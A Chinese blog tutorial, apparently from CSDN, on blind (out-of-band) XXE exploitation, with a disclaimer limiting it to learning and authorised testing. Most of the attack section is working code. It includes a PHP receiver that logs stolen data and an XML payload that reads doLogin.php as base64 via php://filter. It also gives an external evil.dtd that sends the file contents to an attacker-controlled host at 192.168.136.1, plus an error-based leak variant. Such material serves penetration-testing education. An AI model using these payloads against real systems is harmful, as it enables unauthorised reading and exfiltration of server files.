XXE无回显攻击详解

今天继续给大家介绍渗透测试相关知识，本文主要内容是XXE无回显攻击详解。

免责声明：
本文所介绍的内容仅做学习交流使用，严禁利用文中技术进行非法行为，否则造成一切严重后果自负！
再次强调：严禁对未授权设备进行渗透测试！

一、XXE无回显攻击简介

在XXE漏洞详解（三）——XXE漏洞实际运用一文中，我们讲解了XXE漏洞在目标站点站点存在回显的情况下如何利用。但是，有时目标站点只会接收并处理我们上传的XML文档，但是并不会将处理结果显示在页面上。我们把这种情况称之为无回显的XXE漏洞。
针对这种情况，我们的思路有两种，一种是让Web服务器访问我们自己搭建的一个站点，将目标文件进行Base64加密后当作访问站点时的一个参数携带，这样我们就可以接收信息了。另一种思路是使得Web获得敏感文件数据后，访问一个不存在的地址，这样在页面上会产生报错，我们也可以获得信息了。

二、XXE无回显攻击实战

下面，我们就进行XXE无回显的攻击实战。
我们首先来搭建一个可以获取信息的站点，PHP代码如下所示：

<?php
$data=$_GET['data'];
$fp = fopen('data.txt','a');
fwrite($fp,$data);
fclose($fp);
echo "<user><username>admin</username><password>admin</password></user>";
?>

在上述代码中，PHP会接收以GET方式传入的data变量值，并将这个变量值写入本地的data.txt文档，并且还会返回一个XML格式的数据。假设这个站点IP地址为192.168.136.1（本地实验使用，真正实战中因该为一个公网IP地址）。那么我们的EXP如下所示：

<!DOCTYPE updateProfile [<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=./doLogin.php"><!ENTITY % dtd SYSTEM "http://192.168.136.1/test/evil.dtd">%dtd;%send;
]>

而http://192.168.136.1/test/evil.dtd文件的内容是：

<!ENTITY % all"<!ENTITY % send SYSTEM 'http://192.168.136.1/test/receive.php?data=%file;'>"
>
%all;

这样，我们将上述EXP输入后，查看本地data.txt文件，结果如下所示：

此外，如果我们把http://192.168.136.1/test/evil.dtd文件中的IP地址改为一个根本不存在的IP地址，那么就会在页面上产生报错，也可以将获得的信息显现出来，如下所示：

原创不易，转载请说明出处：https://blog.csdn.net/weixin_40228200